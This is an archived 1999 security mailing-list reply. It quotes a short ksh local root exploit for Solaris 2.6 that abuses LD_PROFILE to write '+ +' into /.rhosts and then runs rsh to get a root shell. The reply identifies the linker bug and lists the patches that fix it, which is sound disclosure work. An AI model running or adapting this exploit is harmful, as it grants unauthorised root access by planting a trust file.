>works on solaris 2.6 sparc anyway... > >#! /bin/ksh ># LD_PROFILE local root exploit for solaris ># steveat_private 19990922 >umask 000 >ln -s /.rhosts /var/tmp/ps.profile >export LD_PROFILE=/usr/bin/ps >/usr/bin/ps >echo + + > /.rhosts >rsh -l root localhost csh -i This is bug 4150646 (or rather, 1241843, which resurfaced after an extensive rewrite of the dynamic linker) It's been fixed in Solaris 7 and with the following patches in other releases: 103242-07: SunOS 5.5: linker patch 103243-07: SunOS 5.5_x86: linker patch 103627-11: SunOS 5.5.1: Linker patch 103628-10: SunOS 5.5.1_x86: Linker patch 105490-07: SunOS 5.6: linker patch 105491-05: SunOS 5.6_x86: linker patch The bug was originally fixed in 5.5.1 and back patched; I rediscovered that it was back in 2.6 (which also meant it was in the process of being patched back into 5.5/5.5.1, but I think those patches were held up until the regression was fixed); this was all well before S7 was released. The original bug was also fixed in the following patches: 102049-05: SunOS 5.4: linker fixes 102303-05: SunOS 5.4: POINT PATCH: linker fixes 102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes 102778-03: SunOS 5.4_x86: linker patch Casper
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:05 PDT